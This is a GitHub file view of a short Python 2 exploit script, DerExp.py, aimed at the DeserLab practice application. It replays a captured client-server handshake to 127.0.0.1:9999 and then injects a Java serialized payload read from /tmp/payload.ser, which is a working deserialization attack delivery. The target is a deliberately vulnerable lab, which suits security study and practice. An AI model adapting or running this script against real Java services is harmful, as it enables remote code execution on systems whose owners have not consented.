-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathDerExp.py
More file actions
49 lines (37 loc) · 995 Bytes
/
DerExp.py
File metadata and controls
49 lines (37 loc) · 995 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import socket
import binascii
'''
通过对DeserLab server client交互过程数据包抓包,模拟发送数据包,并替换序列化数据
'''
with open("/tmp/payload.ser", 'r') as f:
payload = f.read()
s = socket.socket(family=socket.AF_INET, type = socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.recv(1024)
print "connect"
bolb = "\xac\xed\x00\x05"
s.sendall(bolb)
s.recv(1024)
print "header"
s.recv(1024)
bolb1 = "\x77\x04"
s.sendall(bolb1)
bolb2 = "\xf0\x00\xba\xaa"
s.sendall(bolb2)
s.recv(1024)
print "2"
s.recv(1024)
bolb3 = "\x77\x02"
s.sendall(bolb3)
bolb4 = "\x01\x01"
s.sendall(bolb4)
print "name"
bolb9 = "\x77\x04"
s.sendall(bolb9)
bolb5 = binascii.a2b_hex("00027875")
s.sendall(bolb5)
'''
替换7372 ...部分
'''
bolb6 = payload[4:]
s.sendall(bolb6)